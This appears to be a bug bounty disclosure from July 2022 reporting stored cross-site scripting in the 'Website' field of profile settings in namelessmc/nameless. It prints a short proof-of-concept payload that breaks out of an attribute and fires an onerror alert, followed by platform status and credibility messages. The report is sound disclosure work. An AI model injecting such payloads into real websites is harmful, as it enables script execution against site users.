Stored XSS in profile settings. in namelessmc/nameless
Jul 2nd 2022
Stored XSS via "Website" box in Profile Settings.
Proof of Concept
Go to profile settings, put the following payload in the "website" box :
google.com"><img src=x onerror=alert(document.domain)>
Save, and see the xss triggered !
We are processing your report and will contact the namelessmc/nameless team within 24 hours. a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher's credibility has increased: +7
to join this conversation